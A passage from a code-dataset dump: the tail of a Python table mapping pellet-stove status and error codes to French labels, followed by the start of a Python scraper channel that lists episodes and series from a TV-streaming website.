p.\"],\n\t\t\t\t\t\t[43, \"Nettoyage haute p.\"],\n\t\t\t\t\t\t[44, \"Débloquage vis sans fin\"],\n\t\t\t\t\t\t[45, \"AUTO ECO\"],\n\t\t\t\t\t\t[46, \"Standby\"],\n\t\t\t\t\t\t[48, \"Diagnostique\"],\n\t\t\t\t\t\t[49, \"CHARG. VIS SANS FIN\"],\n\t\t\t\t\t\t[50, \"Erreur A01 - Allumage raté\"],\n\t\t\t\t\t\t[51, \"Erreur A02 - Pas de flamme\"],\n\t\t\t\t\t\t[52, \"Erreur A03 - Surchauffe du réservoir\"],\n\t\t\t\t\t\t[53, \"Erreur A04 - Température des fumées trop haute\"],\n\t\t\t\t\t\t[54, \"Erreur A05 - Obstruction conduit - Vent\"],\n\t\t\t\t\t\t[55, \"Erreur A06 - Mauvais tirage\"],\n\t\t\t\t\t\t[56, \"Erreur A09 - Défaillance sonde de fumées\"],\n\t\t\t\t\t\t[57, \"Erreur A11 - Défaillance motoréducteur\"],\n\t\t\t\t\t\t[58, \"Erreur A13 - Température carte mère trop haute\"],\n\t\t\t\t\t\t[59, \"Erreur A14 - Défaut Active\"],\n\t\t\t\t\t\t[60, \"Erreur A18 - Température d'eau trop haute\"],\n\t\t\t\t\t\t[61, \"Erreur A19 - Défaut sonde température eau\"],\n\t\t\t\t\t\t[62, \"Erreur A20 - Défaut sonde auxiliaire\"],\n\t\t\t\t\t\t[63, \"Erreur A21 - Alarme pressostat\"],\n\t\t\t\t\t\t[64, \"Erreur A22 - Défaut sonde ambiante\"],\n\t\t\t\t\t\t[65, \"Erreur A23 - Défaut fermeture brasero\"],\n\t\t\t\t\t\t[66, \"Erreur A12 - Panne controleur motoréducteur\"],\n\t\t\t\t\t\t[67, \"Erreur A17 - Bourrage vis sans fin\"],\n\t\t\t\t\t\t[69, \"Attente Alarmes securité\"],\n\t\t\t\t\t\t]],\n\t[2,\"Etat du ventilateur d'ambiance\",[\n\t\t\t\t\t\t\t\t\t\t[0, \"Désactivé\"],\n\t\t\t\t\t\t\t\t\t\t[1, \"Niveau 1\"],\n\t\t\t\t\t\t\t\t\t\t[2, \"Niveau 2\"],\n\t\t\t\t\t\t\t\t\t\t[3, \"Niveau 3\"],\n\t\t\t\t\t\t\t\t\t\t[4, \"Niveau 4\"],\n\t\t\t\t\t\t\t\t\t\t[5, \"Niveau 5\"],\n\t\t\t\t\t\t\t\t\t\t[6, \"Automatique\"],\n\t\t\t\t\t\t\t\t\t\t]],\n\t[5,\"Température des fumées\"],\n\t[6,\"Température ambiante\"],\n\t[10,\"Etat de la bougie\"],\n\t[11,\"ACTIVE - Set\"],\n\t[12,\"RPM - Ventilateur fummées\"],\n\t[13,\"RPM - Vis sans fin - SET\"],\n\t[14,\"RPM - Vis sans fin - LIVE\"],\n\t[20,\"Etat du mode Active\"], #0: Désactivé, 1: Activé\n\t[21,\"ACTIVE - Live\"],\n\t[22,\"Mode de régulation\",[\n\t\t\t\t\t\t\t\t[0, \"Manuelle\"],\n\t\t\t\t\t\t\t\t[1, \"Dynamique\"],\n\t\t\t\t\t\t\t\t]],\n\t[23,\"Mode ECO\"],\n\t[25,\"Mode Chronotermostato\"],\n\t[26,\"TEMP - Consigne\"],\n\t[28,\"TEMP - Carte mère\"],\n\t[29,\"Puissance Active\",[\n\t\t\t\t\t\t\t[11, \"Puissance 1\"],\n\t\t\t\t\t\t\t[12, \"Puissance 2\"],\n\t\t\t\t\t\t\t[13, \"Puissance 3\"],\n\t\t\t\t\t\t\t[14, \"Puissance 4\"],\n\t\t\t\t\t\t\t[15, \"Puissance 5\"],\n\t\t\t\t\t\t\t]],\n\t[32,\"Heure du poêle (0-23)\"],\n\t[33,\"Minutes du poêle (0-29)\"],\n\t[34,\"Jour du poêle (1-31)\"],\n\t[35,\"Mois du poêle (1-12)\"],\n\t[36,\"Année du poêle\"],\n\t[37,\"Heures de fonctionnement total (s)\"],\n\t[38,\"Heures de fonctionnement en puissance 1 (s)\"],\n\t[39,\"Heures de fonctionnement en puissance 2 (s)\"],\n\t[40,\"Heures de fonctionnement en puissance 3 (s)\"],\n\t[41,\"Heures de fonctionnement en puissance 4 (s)\"],\n\t[42,\"Heures de fonctionnement en puissance 5 (s)\"],\n\t[43,\"Heures avant entretien\"],\n\t[44,\"Minutes avant extinction\"],\n\t[45,\"Nombre d'allumages\"],\n\t[49,\"Etat effets sonores\"],\n\t[51,\"Mode\",[\n\t\t\t\t[0, \"Hiver\"],\n\t\t\t\t[1, \"Eté\"],\n\t\t\t\t]],\n\t]","repo_name":"Anthony-55/Maestro","sub_path":"_data_.py","file_name":"_data_.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"fr","doc_type":"code","stars":8,"dataset":"github-code","pt":"2"} +{"seq_id":"15149305571","text":"# -*- coding: utf-8 -*-\r\nfrom core.libs import *\r\n\r\nHOST = 'http://www.wikiseriesonline.nu'\r\n\r\nLNG = Languages({\r\n Languages.es: ['espanol', '3', 'espa%25C3%25B1ol', 'español'],\r\n Languages.en: ['ingles', '5', 'english'],\r\n Languages.la: ['latino', '1'],\r\n Languages.sub_es: ['subtitulado', '4'],\r\n Languages.vo: ['vo']\r\n})\r\n\r\nQLT = Qualities({\r\n Qualities.hd: ['3', '5', 'hd-720p', 'hd'],\r\n Qualities.sd: ['1', '2'],\r\n Qualities.hd_full: ['4', 'hd-1080p']\r\n})\r\n\r\ndef mainlist(item):\r\n logger.trace()\r\n itemlist = list()\r\n\r\n itemlist.append(item.clone(\r\n action=\"newest_episodes\",\r\n label=\"Nuevos episodios\",\r\n url=HOST + '/category/episode',\r\n type=\"item\",\r\n content_type='episodes'\r\n ))\r\n\r\n itemlist.append(item.clone(\r\n action=\"newest_tvshows\",\r\n label=\"Nuevas series\",\r\n url=HOST + '/category/serie',\r\n type=\"item\",\r\n category='tvshow',\r\n content_type='tvshows'\r\n ))\r\n\r\n itemlist.append(item.clone(\r\n action=\"search\",\r\n label=\"Buscar series\",\r\n query=True,\r\n type='search',\r\n category='tvshow',\r\n content_type='tvshows'\r\n ))\r\n\r\n itemlist.append(item.clone(type=\"label\"))\r\n itemlist.append(item.clone(\r\n label=\"Series por género:\",\r\n type=\"label\",\r\n category='tvshow',\r\n content_type='tvshows'\r\n ))\r\n\r\n\r\n for url, label in [(\"/category/accion\", \"Acción\"), (\"/category/anime\", \"Animación\"), (\"/category/aventura\", \"Aventura\"),\r\n (\"/category/ciencia-ficcion\", \"Ciencia Ficción\"), (\"/category/comedia\", \"Comedia\"),\r\n (\"/category/crimen\", \"Crimen\"), (\"/category/drama\", \"Drama\"), (\"/category/fantasia\", \"Fantasía\"),\r\n (\"/category/belico\", \"Guerra\"), (\"/category/horror\", \"Horror\"), (\"/category/misterio\", \"Misterio\"),\r\n (\"/category/romance\", \"Romance\"), (\"/category/suspenso\", \"Suspense\")]:\r\n\r\n itemlist.append(item.clone(\r\n action=\"newest_tvshows\",\r\n label=label,\r\n url=HOST + url,\r\n type=\"item\",\r\n category='tvshow',\r\n group=True,\r\n content_type='tvshows'\r\n ))\r\n\r\n return itemlist\r\n\r\n\r\ndef newest_tvshows(item):\r\n logger.trace()\r\n itemlist = list()\r\n\r\n if not item.url:\r\n item.url = HOST + '/category/serie'\r\n\r\n data = httptools.downloadpage(item.url).data\r\n data = re.sub(r\"\\n|\\r|\\t|\\s{2}\", \"\", data)\r\n\r\n patron = '
.*?src=\"([^\"]+).*?' \\\r\n '(.*?)
' % item.season\r\n for num_episode, url, title, langs in scrapertools.find_multiple_matches(data, patron):\r\n itemlist.append(item.clone(\r\n title=title,\r\n url=url,\r\n action=\"findvideos\",\r\n episode=int(num_episode),\r\n lang=[LNG.get(l) for l in\r\n scrapertools.find_multiple_matches(langs, 'title=\"([^\"]+)\"')],\r\n thumb=None,\r\n type='episode',\r\n content_type='servers'\r\n ))\r\n\r\n return itemlist\r\n\r\n\r\ndef newest_episodes(item):\r\n logger.trace()\r\n itemlist = list()\r\n\r\n if not item.url:\r\n item.url = HOST + '/category/episode'\r\n\r\n data = httptools.downloadpage(item.url).data\r\n data = re.sub(r\"\\n|\\r|\\t|\\s{2}\", \"\", data)\r\n\r\n patron = '
.*?src=\"([^\"]+).*?' \\\r\n ']*>(.*?).*?(.*?).*?'\r\n '